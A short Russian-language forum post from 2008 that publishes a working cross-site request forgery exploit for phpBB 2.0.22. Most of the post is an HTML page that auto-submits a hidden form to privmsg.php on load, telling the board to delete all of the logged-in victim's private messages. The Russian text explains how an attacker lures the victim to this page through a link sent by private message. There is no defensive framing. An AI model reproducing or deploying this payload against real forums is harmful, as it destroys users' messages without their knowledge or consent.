25.01.2008, 02:59
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами:
9681386
Репутация:
2145
|
|
phpBB 2.0.22 Remote PM Delete XSRF Vulnerability
XSRF Vulnerability
Vulnerable: phpBB 2.0.22
Exploit:
Код HTML:
<html>
<head>
</head>
<body onLoad=javascript:document.xsrf.submit()>
<form action="http://[site]/phpBB2/privmsg.php?folder=inbox" method="post"
name="xsrf">
<input type="hidden" name="mode" value="" />
<input type="hidden" name="deleteall" value="true" />
<input type="hidden" name="confirm" value="Yes">
</body>
</html>
Атакующий посылает жертве в ПМ ссылку на страницу, содержащую вышеописанный код, и все личные сообщения жертвы будут удалены.
Последний раз редактировалось iddqd; 25.01.2008 в 16:38..
|
|
|